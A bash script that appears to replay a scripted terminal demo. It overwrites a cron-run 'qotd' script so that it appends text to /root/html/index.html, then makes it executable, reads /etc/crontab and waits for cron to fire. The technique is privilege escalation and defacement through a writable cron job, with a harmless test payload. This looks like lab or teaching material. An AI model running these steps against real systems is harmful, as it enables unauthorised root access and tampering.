#!/bin/bash

echo -n "vulnerable:2> "
sleep 1
echo "echo -e '#!/bin/bash\\n\\necho \"test :)\" >> /root/html/index.html' > qotd" | pv -qL 10 
bash -c "echo -e '#!/bin/bash\\n\\necho \"test :)\" >> /root/html/index.html' > qotd"
echo -n "vulnerable:2> "
sleep 1
echo "cat qotd" | pv -qL 10 
bash -c "cat qotd"
echo -n "vulnerable:2> "
sleep 1
echo "chmod +x qotd" | pv -qL 10 
bash -c "chmod +x qotd"
echo -n "vulnerable:2> "
sleep 1
echo "ls -l qotd" | pv -qL 10 
bash -c "ls -l qotd"
echo -n "vulnerable:2> "
sleep 1
echo "cat /etc/crontab" | pv -qL 10 
bash -c "cat /etc/crontab"
echo -n "vulnerable:2> "
sleep 1
echo "sleep 100" | pv -qL 10 
bash -c "sleep 100"
echo -n "vulnerable:2> "
sleep 1
echo "pwd" | pv -qL 10 
bash -c "pwd"
exit
